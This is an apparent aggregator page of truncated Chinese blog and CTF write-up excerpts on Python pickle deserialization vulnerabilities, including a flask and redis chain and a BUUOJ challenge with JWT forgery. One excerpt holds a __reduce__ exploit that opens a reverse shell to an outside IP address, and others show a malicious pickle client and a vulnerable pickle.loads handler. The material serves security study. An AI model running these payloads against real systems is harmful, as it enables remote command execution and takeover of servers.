零.补充: 补充于2018-02-08,之前研究时候有一个疑惑,python的序列化成二进制,打web服务怎么传这个二进制对象呢,今天请教了身边大神(传说的九零后黑客代表),可以使用base64传输. 测试代码: #client.py import os import sys import base64 import socket import cPickle #定义payload类型 class payload(object): def __init__(self,command): self…

最近看到p神一篇讲python反序列化的文章,结合redis未授权访问组合漏洞,感觉在flask和redis的构架中比较常见,便记录下来. p神原文:https://www.leavesongs.com/PENETRATION/zhangyue-python-web-code-execute.html 漏洞原理: python序列化会通过pickle的dumps和loads来进行序列化和反序列化 其中序列化后的值为 对应的格式如下: c:读取新的一行作为模块名module,读取下一行作为对象名o…

参考文章 一篇文章带你理解漏洞之 Python 反序列化漏洞 Python Pickle/CPickle 反序列化漏洞 Python反序列化安全问题 pickle反序列化初探 前言 上面看完,请忽略下面的内容 Python 中有很多能进行序列化的模块,比如 Json.pickle/cPickle.Shelve.Marshal 一般 pickle 模块较常使用 在 pickle 模块中 , 常用以下四个方法 pickle.dump(obj, file) : 将对象序列化后保存到文件 pickle.…

# 若需要处理更复杂的数据, 用pickle. pickle只有在Python里能用, 其它语言不行. # 序列化. import pickle def sayhi(name): print('hello', name) f = open('test.text', 'wb') info = { 'name': 'alex', 'age': 22, 'func': sayhi } f.write(pickle.dumps(info)) # pickle会默认转换成二进制,所以读取方式应该是wb而不…

import pickle import os class A(object): def __reduce__(self): a = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("121.195.170.181",9999));os.dup2(s.fileno(),0);os.dup2(s.fi…

原理在网页源码中如果出现将用户输入数据进行反序列化当成参数输出时,出现漏洞,可造成任意命令执行例如网页源码try:       become = self.get_argument('become')       p = pickle.loads(urllib.unquote(become))       return self.render('form.html', res=p, member=1)except:        return self.render('form.html', r…

正如本题所说,脑洞有点大.考点还很多,不过最核心的还是python的pickle反序列化漏洞 题目中暗示了要6级号,找了很多页都没看到,于是写了脚本 在第180页有6级号,但是价格出奇的高,明显买不起.bp抓包发现有疑似折扣的参数,把值改低后提交,重定向到了后台页面,但是需要admin才行. 这时一早就发现的JWT便派上了用场.在https://jwt.io/在线解析jwt.data段有我们的用户名,可以伪造成admin,但还需要有密钥. 可以使用工具破解.详情见:https://github.…

pickle与序列化和反序列化 官方文档 模块 pickle 实现了对一个 Python 对象结构的二进制序列化和反序列化. "pickling" 是将 Python 对象及其所拥有的层次结构转化为一个字节流的过程,而 "unpickling" 是相反的操作,会将(来自一个 binary file 或者 bytes-like object 的)字节流转化回一个对象层次结构. pickling(和 unpickling)也被称为"序列化", &qu…

题目过程1.一开始提示说要买到V6,观察源码,发现/static/img/lv/lv4.png.注册之后尝试寻找V6.观察url发现/shop?page=2.尝试写脚本匹配一下.发现在第181页. import requests url="http://20573976-f06b-4718-9d26-89a9471c808b.node3.buuoj.cn/shop?page=" for i in range(0,2000): r=requests.get(url+str(i)) if(…

part1:不求甚解的复现 对于服务端源码:    编写恶意序列化对象生成程序: 将生成的恶意序列化对象输入服务端user,使其执行系统命令.(上面那俩其实都行) part2:原理解释 b'xxx'是python的byte数据类型,一个字符只占一个字节:往往用[\x4A]这种形式表示,但如果是可见字符,也可以直接写. b'xxx'读取时需使用.decode()方法,后面的括号填字符集,默认utf-8 序列化与反序列化,之前在PHP里有初步接触. 在python pickle库中, .dump()…